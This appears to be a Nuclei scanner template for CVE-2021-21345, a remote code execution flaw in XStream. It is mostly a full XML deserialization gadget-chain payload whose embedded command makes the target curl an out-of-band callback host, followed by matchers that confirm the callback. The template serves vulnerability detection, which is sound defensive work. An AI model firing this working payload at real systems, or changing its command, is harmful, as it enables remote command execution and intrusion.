98 lines
4.3 KiB
YAML
98 lines
4.3 KiB
YAML
id: CVE-2021-21345
|
|
|
|
info:
|
|
name: XStream < 1.4.16 - Remote Code Execution
|
|
author: pwnhxl
|
|
severity: critical
|
|
description: |
|
|
XStream before version 1.4.16, there is a vulnerability which may allow a remote attacker who has sufficient rights to execute commands of the host only by manipulating the processed input stream.
|
|
reference:
|
|
- https://x-stream.github.io/CVE-2021-21345.html
|
|
- http://x-stream.github.io/changes.html#1.4.16
|
|
- https://github.com/x-stream/xstream/security/advisories/GHSA-hwpc-8xqv-jvj4
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
|
|
cvss-score: 9.9
|
|
cve-id: CVE-2021-21345
|
|
cwe-id: CWE-78
|
|
tags: cve,cve2021,xstream,deserialization,rce,oast
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST / HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/xml
|
|
|
|
<java.util.PriorityQueue serialization='custom'>
|
|
<unserializable-parents/>
|
|
<java.util.PriorityQueue>
|
|
<default>
|
|
<size>2</size>
|
|
<comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>
|
|
<indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>
|
|
<packet>
|
|
<message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>
|
|
<dataSource class='com.sun.xml.internal.ws.message.JAXBAttachment'>
|
|
<bridge class='com.sun.xml.internal.ws.db.glassfish.BridgeWrapper'>
|
|
<bridge class='com.sun.xml.internal.bind.v2.runtime.BridgeImpl'>
|
|
<bi class='com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl'>
|
|
<jaxbType>com.sun.corba.se.impl.activation.ServerTableEntry</jaxbType>
|
|
<uriProperties/>
|
|
<attributeProperties/>
|
|
<inheritedAttWildcard class='com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection'>
|
|
<getter>
|
|
<class>com.sun.corba.se.impl.activation.ServerTableEntry</class>
|
|
<name>verify</name>
|
|
<parameter-types/>
|
|
</getter>
|
|
</inheritedAttWildcard>
|
|
</bi>
|
|
<tagName/>
|
|
<context>
|
|
<marshallerPool class='com.sun.xml.internal.bind.v2.runtime.JAXBContextImpl$1'>
|
|
<outer-class reference='../..'/>
|
|
</marshallerPool>
|
|
<nameList>
|
|
<nsUriCannotBeDefaulted>
|
|
<boolean>true</boolean>
|
|
</nsUriCannotBeDefaulted>
|
|
<namespaceURIs>
|
|
<string>1</string>
|
|
</namespaceURIs>
|
|
<localNames>
|
|
<string>UTF-8</string>
|
|
</localNames>
|
|
</nameList>
|
|
</context>
|
|
</bridge>
|
|
</bridge>
|
|
<jaxbObject class='com.sun.corba.se.impl.activation.ServerTableEntry'>
|
|
<activationCmd>curl http://{{interactsh-url}} -H 'User-Agent: {{rand_base(6)}}'</activationCmd>
|
|
</jaxbObject>
|
|
</dataSource>
|
|
</message>
|
|
<satellites/>
|
|
<invocationProperties/>
|
|
</packet>
|
|
</indexMap>
|
|
</comparator>
|
|
</default>
|
|
<int>3</int>
|
|
<string>javax.xml.ws.binding.attachments.inbound</string>
|
|
<string>javax.xml.ws.binding.attachments.inbound</string>
|
|
</java.util.PriorityQueue>
|
|
</java.util.PriorityQueue>
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- "http"
|
|
|
|
- type: word
|
|
part: interactsh_request
|
|
words:
|
|
- "User-Agent: {{rand_base(6)}}"
|